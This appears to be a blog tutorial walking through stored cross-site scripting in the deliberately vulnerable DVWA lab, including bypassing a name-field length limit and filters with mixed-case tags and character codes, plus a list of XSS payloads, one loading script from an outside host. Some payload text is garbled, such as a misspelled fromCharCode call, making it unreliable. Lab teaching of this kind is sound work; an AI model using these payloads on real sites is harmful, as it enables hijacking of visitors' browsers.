Stored XSS in DVWA

Refer to the XSS - Cross Site Scripting guide, where I 'm explaining what XSS is and the types of XSS.


The difference between the Reflected XSS and the Stored XSS is that the Stored XSS is, as implied by it's name is stored in the site, so anyone who gets into the site will see your XSS in their browser.

Power on the Metasploitable machine, and get the machine IP.

in the Kali machine open up browser and go to the metasploit IP

DVWA >> DVWA Security >> Low >> submit

DVWA >> “XSS stored"

xss stored - dvwa

Add your name and a message to see how the website works.

Now if you will go to the same URL from a different computer you will see the same message you typed.

So now, let’s inject the payload in one machine / pc.

Once you visit the same website in a different machine, you will get your XSS message.

Your Java script is now stored in the website = stored xss.

In the second browser you will see:

xss payload in terget browser

Next stage is to change the security level to medium.

But before you do that, you need to reset the DB, since you already have stored xss in there:

reset database dvwa

Once you reset the DB, change the security to medium,

DVWA >> DVWA Security >> Medium >> submit

Try to bypass the filter like we did in the Reflected XSS and you will see that nothing works:

You need to think of another way to bypass the defenses of the website.

How about the "Name" field?

If you try to inject your script to the "Name" field you will see that you can’t set more than 10 characters.

In order to bypass that, go to the source code and change the 10 to 50 or more and then try again, like so:

change field for xss

Change:


Inject:


stored xss in name

The result is:


Some website will filter quotes or double quotes so we can try to run the payload with character code via website like this

manipulate the code for xss

To make sure you bypass any filter, you need to change the "alert" of the script as well:

<Script>alert(Stirn.fromCharCode(120, 115, 115, 50, 10))<ScRIpT>

Now if you visit the website from a different machine, you will see the payload you injected, in our example "xss2".


Hope you find this information useful.

There are many more script injections on the web for you to explore, sech as:

  • <IMG onmouseover="alert('xxs')">

  • <IMG SRC=# onmouseover="alert('xxs')">

  • <SCRIPT SRC=http://xss.rocks/xss.js?< B >

  • <BODY BACKGROUND="javascript:alert('XSS')">

All the guides, tips, and tricks on this web site are for education purpose only, the website owner is not accountable for any use of this information